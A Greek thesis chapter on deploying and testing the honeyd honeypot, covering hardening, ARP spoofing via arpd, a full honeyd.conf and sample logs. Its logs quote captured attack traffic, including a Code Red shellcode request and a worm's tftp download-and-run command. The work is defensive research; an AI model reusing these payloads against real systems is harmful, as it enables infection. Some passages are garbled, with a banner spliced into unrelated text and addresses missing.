ΚΕΦΑΛΑΙΟ 3 ΔΟΚΙΜΗ ΤΟΥ HONEYD ΚΑΙ ΤΩΝ VIRTUAL HOSTS
|
|
- Σάπφιρα Μπότσαρης
- 8 χρόνια πριν
- Προβολές:
Transcript
1 ΚΕΦΑΛΑΙΟ 3 ΔΟΚΙΜΗ ΤΟΥ HONEYD ΚΑΙ ΤΩΝ VIRTUAL HOSTS Εισαγωγή Στο πείραμα που πραγματοποιήθηκε το honeyd δημιουργεί και προσομοιώνει 3 virtual hosts και έναν τέταρτο default, ο οποίος θα δέχεται τις αιτήσεις προς οποιαδήποτε ip του C class δικτύου μας. Δηλαδή δημιουργούμε 3 virtual hosts, που πιάνουν τις ip s απο και έναν default host ο οποίος θα απαντάει για όλες τις άλλες ip s του δικτύου. Αυτό γίνεται γιατι προσπαθούμε να πιάσουμε όλη την κίνηση που μπορούμε και με το να έχουμε στη διάθεση μας 254 hosts θα πιάσουμε πολύ μεγαλύτερη κίνηση απ ότι με 4 hosts. Εικόνα 3.1 -δημιουργία virtual hosts από ένα honeyd host. Θέματα πάνω στην εγκατάσταση και ασφάλεια του συστήματος Εγκαταστάθηκε το slackware linux (έκδοση 10.0) σε ένα μηχάνημα χαμηλών δυνατοτήτων (pentium2) στο οποίο θα τρέχει το honeyd, δόθηκε το hostname ikaria και έγινε system hardening ώστε το σύστημα να είναι ασφαλές από τις δικτυακές επιθέσεις. Πιο συγκεκριμένα: έγινε minimum setup υπηρεσιών, ώστε να τρέχουν μόνο οι απαραίτητες απενεργοποιήθηκαν όλες οι περιττές δικτυακές υπηρεσίες εκτός από ssh για remote - 1 -
2 πρόσβαση στο σύστημα και το syslogd για καταγραφή των συμβάντων περάστηκαν τα patches από την έκδοση 10.0 και μετά έγινε recompile στον πυρήνα για καλύτερη επίδοση επιπλέον βήματα για την ασφάλεια του συστήματος θα μπορούσαν να αποτελέσουν το Bastille linux (σύνολο από scripts για system hardening), κάποιο kernel patch όπως το grsecurity, ή το openwall. Τα kernel patches είναι patches που εφαρμόζονται στον πυρήνα - και άρα θέλει recompile-και προσφέρουν σημαντική προστασία, παράδειγμα αποτρέπουν οποιαδήποτε επίθεση buffer overflow. αν και δεν έχει συμβεί μέχρι σήμερα θα μπορούσε να βρεθεί κάποιο remote exploit για το honeyd (αν και σε περίπτωση όπως στη δική μας που φιλτράρεται ο honeyd host και δεν είναι προσβάσιμος απέξω δεν θα επηρέαζε) και με αυτό τον τρόπο να αποκτήσει κάποιος πρόσβαση στον honeyd host. Γι αυτό μεταξύ των λύσεων που θα μπορούσαν να χρησιμοποιηθούν είναι η εκτέλεση του honeyd σε chroot περιβάλλον ή μέσω του systraceέτσι είναι πολύ πιο δύσκολο να πάρει κάποιος root. Το systrace αρχικά τρέχει το honeyd και από μόνο του δημιουργεί την πολιτική για αυτό και συγκεκριμένα καταγράφει ποιες κλήσεις συστήματος -system calls-καλεί το honeyd και όταν αυτό ξεκινάει κατω από το systrace, αν γίνει κάποια κλήση συστήματος η οποία δεν είναι καταγραμμένη στην πολιτική, το systrace δεν της επιτρέπει να εκτελεστεί. Κάθε φορά που γίνεται αλλαγή στο honeyd.conf, πχ προσθήκη μιας υπηρεσίας, θα πρέπει το systrace να επανεκτελείται για να καταγράψει τις αλλαγές. Μελετήθηκε η χρήση αυθεντικοποίησης με δημόσιο κλειδί (public key ssh authentication) για remote administration στον honeyd host αντί χρήσης κωδικών. Δεν υπάρχει λόγος το honeyd να είναι προσβάσιμο από το internet, γι αυτό μπλοκάρονται όλες οι εισερχόμενες/εξερχόμενες συνδέσεις προς/από τον ikaria. Έπειτα εγκαταστάθηκε η πιο πρόσφατη έκδοση του honeyd, η 1.0, η οποία μάλιστα κυκλοφόρησε πριν από λίγες μέρες. Η εγκατάσταση του honeyd είναι εύκολη δουλειά ακόμα και για αρχάριους στο linux, ενώ υπάρχει έκδοση του honeyd και για τα Microsoft windows. Στο παράρτημα της διπλωματικής υπάρχουν οδηγίες για την εγκατάσταση του honeyd. Δρομολόγηση των συνδέσεων Η δρομολόγηση των συνδέσεων που προορίζονται για τις ip s του δικτύου μας μπορεί να γίνει με 3 τρόπους: Να ορίσουμε ρητά τα route στον router μας που κατευθύνουν το μέρος του δικτύου που θέλουμε να δώσουμε στα virtual hosts, στο honeyd host. Το μειονέκτημα του είναι ότι θέλει ρύθμιση στον router κάτι που σημαίνει ότι πρέπει να έχουμε πρόσβαση σε αυτόν. Είναι προτιμότερο να το αποφύγουμε και να προτιμήσουμε κάποια λύση που έχει να κάνει μόνο με το μηχάνημα μας. Με κάνουμε χρήση της δυνατότητας arp-proxy στον router. Το arp-proxy μπορεί να συσχετίσει ip διευθύνσεις που δεν έχουν δεσμευτεί με τη διεύθυνση MAC του host που του ορίζουμε, στατικά όμως και όχι δυναμικά όπως το arpd. Πολύ χρήσιμο για περιπτώσεις όπου έχουμε λίγες ip's που θέλουμε να αντιστοιχίσουμε σε μια Mac adress και έτσι αποφεύγουμε το arp spoofing σε ολόκληρο το δίκτυο. Να κάνουμε χρήση του arpd, το οποίο βρίσκει τις διευθύνσεις που δεν χρησιμοποιούνται στο δίκτυο που του δίνουμε και οποιαδήποτε αίτηση για διεύθυνση του δικτύου αυτού περνάει στο honeyd host (arp spoofing). Αυτό βολεύει στην περίπτωση που έχουμε ένα ολόκληρο δίκτυο πχ C class το οποίο έχει ips που χρησιμοποιούνται αλλά και αδέσμευτες και θέλουμε να δώσουμε τις αδέσμευτες για παρακολούθηση, με δυναμική εύρεση αυτών
3 Λειτουργία arpd Η δουλειά του arpd είναι να παρατηρεί την κίνηση για το δίκτυο ή υποδίκτυο που του ορίζουμε και να απαντά με τη διεύθυνση MAC του host στον οποίο τρέχει για τις αιτήσεις που γίνονται. Δηλαδή απαντάει στα πακέτα που προορίζονται για ανενεργές IP s σαν να προορίζονταν για τον host στον οποίο τρέχει το arpd. Σε ένα δίκτυο το arpd μπορεί να δημιουργήσει ένα σωρό προβλήματα, πχ αν τρέχει dhcp στο δίκτυο δεν θα δουλεύει, γιατί το arpd θα απαντάει σε όλες τις αιτήσεις και θα φαίνεται πως όλες οι διευθύνσεις είναι πιασμένες. Επίσης μπορεί να κλέψει την IP νόμιμων hosts και να απαντάει στη θέση τους. Αυτό λέγεται arp spoofing και εκμεταλλεύεται ένα κενό στη λειτουργία του πρωτοκόλλου arp. Αξίζει να δει κανείς ποιο είναι το κενό αυτό στο arp, γιατί αποτελεί μια χαρακτηριστική περίπτωση του πώς είτε από κακό σχεδιασμό ή για λόγους διευκόλυνσης τα βασικά πρωτόκολλα που αποτελούν το internet, το tcp, το arp, το bgp και άλλα, η ραχοκοκαλιά του δηλαδή, έχουν σοβαρές τρύπες στην ασφάλεια τους που σχετικά εύκολα μπορεί να εκμεταλλευτεί κανείς. Το πρωτόκολλο arp (address resolution protocol) αντιστοιχεί ip διευθύνσεις σε ethernet διευθύνσεις. Όταν ένας host θέλει να εγκαταστήσει μια σύνδεση, στέλνει ένα arp broadcast που φέρει την ip διεύθυνση με την οποία θέλει να επικοινωνήσει και ζητάει να του επιστραφεί η Mac διεύθυνση για να μπορέσει να εγκαταστήσει τη σύνδεση. Για λόγους ευκολίας, το σύστημα arp παρέχει ένα arp cache, έναν πίνακα που αποθηκεύει Mac διευθύνσεις για ευκολία, ώστε οι μηχανές να μπορούν να συνδεθούν γρήγορα σε γνωστούς hosts, σε hosts δηλαδή με τους οποίους έχουν επικοινωνήσει ήδη, χωρίς να πρέπει να στείλουν ένα broadcast και να ρωτούν ποια διεύθυνση έχουν. Στο arp spoofing ο επιτιθέμενος host παρακολουθεί συνέχεια το δίκτυο και μόλις δει κάποια αίτηση για οποιαδήποτε ip, αφού περιμένει λίγο χρόνο ώστε να σιγουρευτεί ότι κανένας host δε στέλνει απάντηση -και άρα δεν τη χρησιμοποιεί κανείς-στέλνει απάντηση ότι η ip αυτή έχει hardware διεύθυνση τη δικιά του Mac address. Έτσι ο host που έψαχνε για την ip αποθηκεύει στην cache του την αντιστοιχία Mac διεύθυνση με την ip. Με την εντολή arp του unix βλέπουμε τον πίνακα arp που κρατάει ο υπολογιστής μας. Οι τιμές αυτές διατηρούνται για μερικά λεπτά μόνο. Το arpd γράφτηκε το 2001 από τον Dug Song, αλλά απο τότε δεν έχει ασχοληθεί κανείς με τον κώδικα του. Πιο εξειδικευμένα εργαλεία όπως τα hunt, ettercap, dsniff, arpspoof κάνουν arp spoofing και χρησιμοποιούνται για man-in-the-middle attacks, μια απο τις πιο δύσκολες να αποτραπούν κατηγορίες επιθέσεων και για αυτά υπάρχει αρκετό documentation. Το παρακάτω σενάριο δείχνει τη λειτουργία του arpd: root@ikaria:/usr/honeyd#./arpd -d -i eth /24-3 -
4 arpd[568]: listening on eth0: arp and (dst net /24) and not ether src 00:90:27:22:86:00 (ξεκινάει το arpd στον ikaria) arpd[568]: arpd_lookup: no entry for arpd[568]: arpd_send: who-has tell arpd[568]: arpd_send: who-has tell arpd[568]: arp reply is-at 00:90:27:22:86:00 tcpdump arp (σε άλλο παράθυρο τρέχει το tcpdump και κοιτάζει μόνο τα πακέτα του πρωτοκόλλου arp) 12:43: arp who-has tell :43: arp who-has (Broadcast) tell :43: arp who-has olympos.lab.epmhs.gr tell :43: arp reply olympos.lab.epmhs.gr is-at 00:02:b3:48:7c:8f 12:43: arp who-has (Broadcast) tell :44: arp who-has tell :44: arp reply is-at 00:90:27:22:86:00 Ο host ζητάει να μάθει την Mac address του Το arpd προωθεί την ερώτηση και εφόσον δεν παίρνει απάντηση από πουθενά εντός λίγων δευτερολέπτων, απαντάει ότι το έχει Mac address αυτή του ikaria! Απαντάει δηλαδή με τη δική του Mac σε οποιαδήποτε αίτηση γίνεται και δεν απαντάει κάποιος άλλος host. HONEYD version 1.0 Η πιο πρόσφατη έκδοση του honeyd είναι η έκδοση 1.0. Περιλαμβάνει web server ο οποίος εμφανίζει βασικές πληροφορίες για τη ρύθμιση του honeyd, πόσα virtual hosts δημιουργήθηκαν και με τι λειτουργικό σύστημα το καθένα, καθώς επίσης και ποιες υπηρεσίες προσομοιώνουν και ποιο πρωτόκολλο -tcp ή udp-και κάποια λίγα στατιστικά, όπως τον αριθμό των tcp ή udp συνδέσεων που έγιναν. Εγκαθίσταται στο /usr/local/share/honeyd και ξεκινώντας ρίχνει τα προνόμια σε 32767:32767 ώστε να μην τρέχει σαν root, έτσι ώστε αν κάποια επίθεση στο honeyd καταφέρει να το σπάσει να μην αποδώσει και προνόμια root. Η τεχνική αυτή, να ξεκινάει μια υπηρεσία απο τον root και αμέσως να ρίχνει τα προνόμια χρησιμοποείται από τον apache web server, την mysql και πολλές άλλες διάσημες υπηρεσίες. Το honeyd εγκαθίσταται στο /usr/honeyd/honeyd-1.0/ και τα logs θα μπαίνουν στο /usr/honeyd/log/
5 Το αρχείο με τις ρυθμίσεις που ορίζει ποια virtual hosts θα δημιουργηθούν, ποιες υπηρεσίες και λειτουργικό σύστημα θα προσομειώνει το καθένα και ποιες ip s θα πάρουν, είναι το honeyd.conf. Το αρχείο αυτό έχει πολύ εύκολη σύνταξη, ενώ στο πείραμα που πραγματοποιήθηκε χρειάστηκε να τροποποιηθεί αρκετές φορές. Η ρύθμιση του honeyd.conf είναι η παρακάτω: root@ikaria:/usr/honeyd/honeyd-1.0# cat honeyd.conf create default set default personality Microsoft Windows XP Professional SP1 set default uptime set default maxfds 35 add default tcp port 80 scripts/win2k/iisemulator-0.95/iisemul8.pl add default tcp port 22 sh scripts/test.sh $ipsrc $dport #add default tcp port 22 proxy $ipsrc:22 #add default udp port 53 proxy :53 add default tcp port 135 open add default tcp port 21 sh scripts/win2k/msftp.sh $ipsrc $sport $ipdst $dport add default tcp port 143 sh scripts/win2k/exchange-imap.sh $ipsrc $sport $ipdst $dport add default tcp port 25 sh scripts/win2k/exchange-smtp.sh $ipsrc $sport $ipdst $dport add default tcp port 137 proxy $ipsrc:137 add default tcp port 138 proxy $ipsrc:138 add default tcp port 139 proxy $ipsrc:139 add default tcp port 445 proxy $ipsrc:445 add default tcp port 1080 scripts/mydoom.pl add default tcp port 3127 scripts/mydoom.pl add default tcp port 3128 scripts/mydoom.pl add default tcp port scripts/mydoom.pl add default tcp port 4444 sh scripts/4444.sh $ipsrc $ipdst add default tcp port 5554 scripts/cmdexe.pl -p winxp add default tcp port 9996 scripts/cmdexe.pl -p winxp add default tcp port 8967 scripts/cmdexe.pl -p winxp add default tcp port scripts/cmdexe.pl -p winxp add default tcp port 3117 scripts/cmdexe.pl -p winxp set default default tcp action reset set default default udp action reset - 5 -
6 set default default icmp action open create router set router personality Cisco 1601R router running IOS 12.1(5) set router default tcp action reset set router default udp action reset add router tcp port 22 scripts/test.sh add router tcp port 23 scripts/router-telnet.pl set router uptime create linux set linux personality Linux kernel add linux tcp port 80 sh scripts/suse8.0/apache.sh $ipsrc $sport $ipdst $dport add linux tcp port 21 sh scripts/suse8.0/proftpd.sh $ipsrc $sport $ipdst $dport add linux tcp port 25 sh scripts/suse8.0/sendmail.sh $ipsrc $sport $ipdst $dport add linux tcp port 22 sh scripts/suse8.0/ssh.sh $ipsrc $sport $ipdst $dport add linux tcp port 110 sh scripts/suse8.0/qpop.sh $ipsrc $sport $ipdst $dport add linux tcp port 143 sh scripts/suse8.0/cyrus-imapd.sh $ipsrc $sport $ipdst $dport add linux tcp port 8080 sh scripts/suse8.0/squid.sh $ipsrc $sport $ipdst $dport add linux udp port 514 sh scripts/suse8.0/syslogd.sh $ipsrc $sport $ipdst $dport set linux default tcp action reset set linux default udp action reset set linux default icmp action open set linux uptime create relay set relay personality Sun Solaris 9 set relay default tcp action reset set relay default udp action reset add relay tcp port 25 scripts/smtp.pl -q add relay tcp port 8080 scripts/proxy.pl bind router bind default bind linux bind relay - 6 -
7 Αρχικά η εντολή create δημιουργεί ένα template, το οποίο ρυθμίζει τα virtual hosts. Η εντολή set δίνει την προσωπικότητα στο virtual host, δηλαδή το λειτουργικό σύστημα το οποίο προσομοιώνει και αν θέλουμε και επιπλέον ρυθμίσεις, όπως το uptime. Παραπάνω το αρχείο ρύθμισης του honeyd δημιουργεί τέσσερα templates, με τα εξής λειτουργικά συστήματα: Microsoft Windows XP Professional SP1, Cisco 1601R router running IOS 12.1(5), Linux kernel και Sun Solaris 9. Η add περιγράφει τις υπηρεσίες που θα είναι προσβάσιμες, στις οποίες προσδιορίζουμε το πρωτόκολλο (tcp ή udp), την πόρτα στην οποία ακούνε (πχ 80) καιτην εντολή που θα εκτελείται για την υπηρεσία αυτή (πχ scripts/web.sh). Με την set επίσης ορίζουμε την default συμπεριφορά των δικτυακών πρωτοκόλλων : block κάνει drop όλα τα πακέτα, reset κλείνει όλες τις πόρτες και εμείς ορίζουμε ποιες θα είναι ανοικτές και open αφήνει όλες τις πόρτες ανοικτές. Παράδειγμα στον linux virtual host πέρα από τις πόρτες 21, 22, 25, 80, 110, 514, 8080 τις οποίες ανοίγουμε και μάλιστα ορίζουμε και κάποιες υπηρεσίες να τρέχουν σε αυτές τις πόρτες, οι υπόλοιπες tcp και udp πόρτες είναι κλειστές. Το icmp είναι φυσικά ανοικτό, ώστε να απαντάει ο host σε pings που του γίνονται. Με την εντολή bind ip template ορίζουμε ποια ip θα καταλαμβάνει το κάθε template που δημιουργήσαμε. Το πρώτο template με το όνομα default πέρα απο την ip που του ορίζουμε -bind default-θα αντιστοιχεί τον virtual host default σε οποιαδήποτε ip βρίσκει ελεύθερη στο δίκτυο. Αυτό το καταφέρνει προφανώς με τη βοήθεια του arpd, όπως περιγράφεται παραπάνω. Μόλις το arpd εντοπίσει στο δίκτυο πως γίνεται μια αίτηση για κάποια ip που δεν χρησιμοποιείται, το arpd απαντάει με τη Mac διεύθυνση του honeyd host. Το honeyd αντιστοιχεί σε αυτή την ip κάποιο απο τα virtual hosts που έχουμε ορίσει, αν προορίζεται για αυτή την ip, αλλιώς την αντιστοιχεί στον default virtual host -το default είναι δεσμευμένη λέξη για τα templates από το honeyd. Το γεγονός οτι μια πόρτα είναι ανοικτή αλλά δεν τρέχει κάποια υπηρεσία σε αυτή σημαίνει οτι όταν κάποιος host επιχειρήσει σύνδεση με αυτή την πόρτα, το honeyd θα καταγράψει τη σύνδεση που έγινε, αλλά δεν θα μπορεί να δωθεί κάποια απάντηση, αφού δεν τρέχει κάποια υπηρεσία. Συνοπτικός πίνακας των virtual hosts Host λειτουργικό Υπηρεσία που προσομοιώνεται πόρτα πρωτόκολλο Router Cisco 1601R IOS 12.1(5)" ssh 22 tcp - 7 -
8 Default tcp/udp action reset,icmp open telnet 23 tcp Default Windows XP Professional SP1 ms ftp 21 tcp ssh 22 tcp smtp 25 tcp iis web server 80 tcp file sharing/netbios 135,137,1 38,139,44 5 tcp exchange-imap 143 tcp mydoom worm 1080 tcp backdoor mydoom worm backdoor mydoom worm backdoor mydoom worm backdoor 3117 tcp 3127 tcp 3128 tcp MBsblast cleaner 4444 tcp cmd prompt 5554 tcp cmd prompt 8967 tcp cmd prompt 9996 tcp cmd prompt tcp cmd prompt tcp Default tcp/udp action reset,icmp open Linux Linux kernel proftpd 21 tcp ssh 22 tcp sendmail 25 tcp apache 80 tcp qpop 110 tcp cyrus imapd 143 tcp squid web proxy 8080 tcp syslogd 514 udp - 8 -
9 Default tcp/udp action reset,icmp open Relay Sun solaris 9 fake open mail relay server 25 tcp fake open proxy 8080 tcp Default tcp/udp action reset,icmp open Οι περισσότερες από τις υπηρεσίες που προσημειώνονται περιέχονται στον φάκελο scripts/ του ίδιου του honeyd. Επιπλέον υπηρεσίες υπάρχουν στην επίσημη σελίδα του honeyd. Σχόλια πάνω στο configuration file. Για το windows xp virtual host είναι ρυθμισμένες οι εξής υπηρεσίες, ώστε το σύστημα να φαίνεται περισσότερο αληθινό: web server (IIS 5.0) που περιλαμβάνει wwwroot με ιστοσελίδες και iis_data με σελίδες των μηνυμάτων λάθους. msftp ftp server, ssh το οποίο εμφανίζει ένα ssh prompt και απλά καταγράφει τα ονόματα που δέχεται, ms exchange 2000 imap4rev1 imap server, exchange smtp server. Οι πόρτες 135, 137, 138, 139 και 445 είναι ανοικτές ώστε να μπορούν να γίνονται συνδέσεις. Τις πόρτες αυτές χρησιμοποιούν τα windows για file sharing/netbios. Στις πόρτες 1080, 3127, 3128, ακούει ένα emulator του backdor που εγκαθιστά το worm mydoom το οποίο log-άρει τα uploaded αρχεία που ανεβάζει το worm και καταγράφει τις προσπάθειες σύνδεσης. Στις πόρτες 5554, 9996, 20168, 3117 τρέχει το script cmdexe.pl, το οποίο είναι emulator για dos command prompt. Τις πόρτες αυτές χρησιμοποιούν πολλά worms, όπως ο sasser,ο msblaster και άλλοι. Στην πόρτα 4444 τρέχει το script 4444.sh, το οποίο εκτελεί κάποιες εντολές και προσπαθεί να καθαρίσει τον host που του κάνει επίθεση και προσπαθεί να τον μολύνει, από τον ιο blaster (περισσότερα γι αυτό παρακάτω). Στη συνέχεια του πειράματος δημιουργήθηκε και προστέθηκε script που επιχειρεί να καθαρίσει όποιον μολυσμένο host του επιτίθεται απο το worm sasser. Για το linux virtual host ρυθμίστηκαν διάφορες τυπικές υπηρεσίες ενός linux συστήματος, όπως προσομοίωση apache web server, proftpd ftp server, ssh server, sendmail server, syslogd, imapd, squid proxy. Για το router virtual host ρυθμίστηκαν μόνο δυο υπηρεσίες, telnet και ssh. Τέλος το solaris virtual host τρέχει δυο script, τα οποία δημιουργούν έναν fake open relay mail - 9 -
10 server (στην πόρτα 25) και έναν fake open proxy (στην πόρτα 8080). Οι δυο αυτές υπηρεσίες ρυθμίστηκαν ώστε να αποτελούν μια παγίδα για spammers οι οποίοι θα ξεγελαστούν, νομίζοντας ότι θα μπορούν να στείλουν τα spam τους. ΔΟΚΙΜΗ ΤΟΥ HONEYD Πρώτα ξεκινάμε το arpd ώστε η δρομολόγηση των συνδέσεων προς τους virtual hosts που το honeyd δημιουργεί να είναι εφικτή: -d -i eth /24 arpd[254]: listening on eth0: arp and (dst net /24) and not ether src 00:90:27:22:86:00 Έπειτα ξεκινάμε το honeyd: -u 99 -g 99 -d -l /usr/honeyd/log/messages -p nmap.prints -f honeyd.conf /24 Honeyd V1.0 Copyright (c) Niels Provos honeyd[284]: started with -d -l /usr/honeyd/log/messages -p nmap.prints -f honeyd.conf Warning: Impossible SI range in Class fingerprint IBM OS/400 V4R2M0 Warning: Impossible SI range in Class fingerprint Microsoft Windows NT 4.0 SP3 honeyd[284]: listening promiscuously on eth0: (arp or ip proto 47 or (udp and src port 67 and dst port 68) or (ip and (dst net /24))) and not ether src 00:90:27:22:86:00 honeyd[284]: HTTP server listening on port 80 honeyd[284]: HTTP server root at /usr/local/share/honeyd/webserver/htdocs honeyd[284]: Demoting process privileges to uid 32767, gid honeyd[284]:... Τα switches με τα οποία ξεκινάει το honeyd είναι τα εξής: -d το honeyd θα τρέχει σαν daemon -l /path/to/file το αρχείο στο οποίο αποθηκεύονται τα μηνύματα -p nmap.prints θα χρησιμοποιεί το αρχείο nmap.prints για να πάρει τα fingerprints των λειτουργικών συστημάτων -f honeyd.conf θα χρησιμοποιεί το αρχείο honeyd.conf για τη ρύθμιση του. -u 99 -g 99 τρέχει με τα δικαιώματα του χρήστη nobody, που είναι τα χαμηλότερα, ώστε σε περίπτωση που στο μέλλον βρεθεί κάποιο bug στο honeyd να μην παίρνει root. Για το λόγο αυτό τα δικαιώματα στους φακέλους που χρησιμοποιεί το honeyd ρυθμίστηκαν ανάλογα
11 /24 το ip range στο οποίο θα τρέχουν οι virtual hosts. Οι συνδέσεις γίνονται από τον pluto.lab.epmhs.gr. telnet Trying Connected to Escape character is ^]. Users (authorized or unauthorized) have no explicit or implicit expectation of privacy. Any or all uses of this system may be intercepted, monitored, reca), the legality of my research or these web pages is currently unclear. Felten provides additional information about the resulting restrictions on technology and research. Potentially offending web content has been moved to the Netherlands. Please, support the EFF.corded, copied, audited, inspected, and disclosed to authorized site, and law enforcement personnel, as well as to authorized officials of other agencies, both domestic and foreign. By using this system, the user consents to such interception, monitoring, recording, copying, auditing, inspection, and disclosure at the discretion of authorized site. Unauthorized or improper use of this system may result in administrative disciplinary action and civil and criminal penalties. By continuing to use this system you indicate your awareness of and consent to these terms and conditions of use. LOG OFF IMMEDIATELY if you do not agree to the conditions stated in this warning. User Access Verification Username: mpeeeeeeeee Password: % Access denied Ξεκινάμε μια σύνδεση από τον pluto.lab.epmhs.gr στον στην θύρα 23 (telnet). Το honeyd βγάζει το παραπάνω banner, όπως θα έβγαζε κάποιος router, και μας ζητάει να δώσουμε username/ password. Καταγράφει στο log file την απόπειρα σύνδεσης που έγινε καθώς επίσης και το ζεύγος username/ password που δώσαμε. Connection request: tcp (1xx.xxx.x.30: :23) honeyd[284]: Connection established: tcp (1xx.xxx.x.30: :23) <-> scripts/routertelnet.pl honeyd[284]: E(1xx.xxx.x.30: :23): Attempted login: mpeeeeeeeee/!
12 Καταγραφή συνδέσεων Η καταγραφή των συνδέσεων από το honeyd γίνεται στα αρχεία messages, messages-base, mydoom, cmdexe και στο φάκελο spam/. Το honeyd καταγράφει τις συνδέσεις που έγιναν στα virtual hosts στο αρχείο messages, με την εξής μορφή: :27: udp(17) : :28: tcp(6) S [Windows XP SP1] :28: tcp(6) : 48 S [Windows XP SP1] :48: tcp(6) S [Linux 2.6 ] :48: tcp(6) S [Linux 2.6 ] :37: tcp(6) : 40 R [FreeBSD ] :54: tcp(6) : 60 S [FreeBSD ] όπου ημερομηνία που έγινε η σύνδεση 18:27: ώρα, με ιδιαίτερα μεγάλη ακρίβεια udp πρωτόκολλο (udp, tcp, icmp) host απο τον οποίο έγινε η σύνδεση (source host) 5338 πόρτα απο την οποία έγινε η σύνδεση (source port) ο virtual host που δέχτηκε την σύνδεση (destination host) 1027: η πόρτα στην οποία έγινε η σύνδεση (destination port) Windows XP SP1 το λειτουργικό το οποίο έχει ο source host -το βρίσκει με passive fingerprinting, σε ποσοστό κοντά στο 50%. Το αρχείο messages είναι το κύριο αρχείο από το οποίο θα εξάγουμε στατιστικά για τις
13 συνδέσεις και επιθέσεις που δέχτηκαν οι virtual hosts. Είναι χρήσιμο για να μάθουμε πόσες συνδέσεις και με ποιο πρωτόκολλο έγιναν στα virtual hosts μας, πόσες από αυτές εγκαταστάθηκαν και δεν ήταν απλώς port scannings, ποιες είναι οι πιο ενεργές πόρτες, ποια λειτουργικά έκαναν τις συνδέσεις. Από τα logs του honeyd παίρνουμε τις παραπάνω βασικές πληροφορίες, αλλά τα συμπεράσματα γύρω από τις επιθέσεις βγαίνουν σε συνδυασμό με το snort ή κάποιο άλλο ids. (πχ αριθμός και φύση των alerts που δημιουργήθηκαν). Οι διάφορες υπηρεσίες που τρέχουν οι virtual hosts -πχ apache, sendmail, ssh κατέχουν ρυθμιστεί να καταγράφουν τις συνδέσεις στο αρχείο messages-base. Αυτό για να έχουμε ένα αρχείο με τις καταγραφές από τις υπηρεσίες και όχι πολλά. Η ρύθμιση αυτή έγινε με μικρή παρέμβαση στα scripts που προσομοιώνουν τις υπηρεσίες, ώστε η μεταβλητή LOG να είναι το messages-base Για παράδειγμα: --MARK--,"Thu Feb 17 04:32:39 EET 2005", "apache/http", " ", " ",4521,80, " GET /default.ida?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX X XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u 7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u81 90%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0 Content-type: text/xml Content-length: 3379 ", --ENDMARK- όπου Thu Feb 17 04:32:39 EET 2005 η ημερομηνία και ώρα σύνδεσης apache/http η υπηρεσία που χρησιμοποιήθηκε ο source host o destination host 4521 η πόρτα που χρησιμοποίησε ο source host για να επιχειρήσει σύνδεση 80 η πόρτα στην οποία δέχτηκε σύνδεση ο virtual host. Το Get default.ida? XX... είναι η εντολή που έστειλε ο source host. Με μια γρήγορη αναζήτηση στο google.com ενημερωνόμαστε ότι η κίνηση αυτή προέρχεται από microsoft windows υπολογιστές μολυσμένους από το worm code red καθώς επίσης και διάφορες
14 εκδοχές του, που ψάχνουν για IIS servers και προσπαθούν να εκμεταλλευτούν κάποιο κενό στην ασφάλεια του iis ώστε να μολύνουν άλλα συστήματα [1]. Δεδομένου ότι το πρόβλημα αυτό είναι για τον web server της Microsoft -τον iis-και εμείς τρέχουμε προσομείωση apache, συμπεραίνουμε ότι είτε ο επιτιθέμενος είναι κάποιος με περιορισμένες γνώσεις είτε πρόκειται για μολυσμένο υπολογιστή από κάποιο worm. Στο αρχείο mydoom καταγράφονται οι συνδέσεις που έγιναν από τον emulator του worm mydoom και πιο συγκεκριμένα οι συνδέσεις από μολυσμένους από τον ιο hosts. Τα αρχεία επίσης που ανεβάζει ο ιός αποθηκεύονται σε φακέλους. Παράδειγμα: :55: : mydoom.pl[10567]: connection from :4786 to : :55: : mydoom.pl[10567]: file upload attempt from : :55: : mydoom.pl[10567]: file uploaded to /usr/honeyd/log//65/23/245/85/4786/file.10567, byte(s) written Στο αρχείο cmdexe καταγράφονται οι συνδέσεις στις πόρτες 5554, 9996, 20168, 3117, όπου τα διάφορα worms που εκκινούν σύνδεση σε μια από αυτές τις πόρτες νομίζουν ότι τρέχει κάποιο dos command prompt. Παράδειγμα: :57: : cmdexe.pl[310]: connection from :4297 to : :57: : cmdexe.pl[310]: cmd: USER x :57: : cmdexe.pl[310]: cmd: PASS x :57: : cmdexe.pl[311]: connection from :2140 to : :57: : cmdexe.pl[311]: cmd: tftp -i GET h package.exe & package.exe & exit :57: : cmdexe.pl[311]: hex: :57: : cmdexe.pl[311]: forced exit of cmdexe.pl (eg, ^C in a connection) Στην περίπτωση αυτή ο host είναι μολυσμένος από το worm dabber, το οποίο εκμεταλλεύεται το backdoor που αφήνει το worm sasser αφού μολύνει έναν host για να μεταδοθεί και αυτό το καταλαβαίνουμε από την εντολή tftp -i GET h package.exe & package.exe. Πρόκειται για το πρώτο worm που εξαπλώνεται εκμεταλλεύοντας ένα bug σε κάποιο worm το οποίο έχει ήδη μολύνει έναν υπολογιστή! Περισσότερα για τα worms και τον sasser στα επόμενα κεφάλαια
15 Τέλος, στο φάκελο spam αποθηκεύεται το spam και καταγράφονται οι συνδέσεις που έγιναν απο spammers. Τη δουλειά αυτή την εκτελεί ο fake open mail relay server που τρέχει στον solaris virtual host, λειτουργεί σαν παγίδα για spammers. Η καταγραφή γίνεται ως εξής; Στο αρχείο spam/logfile καταγράφονται οι συνδέσεις από τους spammers με τη μορφή Sat, 26 Feb :22: (EET): : Nr d0/1 όπου Sat, 26 Feb :22: (EET): ημερομηνία και ώρα που χρησιμοποίησε ο spammer σαν αποστολέας που χρησιμοποίησε ο spammer σαν αποδέκτης η ip του spammer. Στον φάκελο spam/queue αλλά και σε φακέλους που δημιουργούνται στον φάκελο spam/ αποθηκεύονται τα spam -τα οποία φυσικά δεν προωθούνται. Περισσότερα για τον τρόπο με τον οποίο δουλεύουν οι spammers, πως προωθείται το spam αλλά και πως το honeyd προσπαθεί να το αντιμετωπίσει, στο κεφάλαιο πολεμώντας το spam. Δοκιμές των virtual hosts Προτού αφήσουμε το honeyd και τα virtual hosts που δημιούργησε να δέχονται συνδέσεις από το internet, καλό είναι να το δοκιμάσουμε ώστε να σιγουρευτούμε ότι οι υπηρεσίες μας 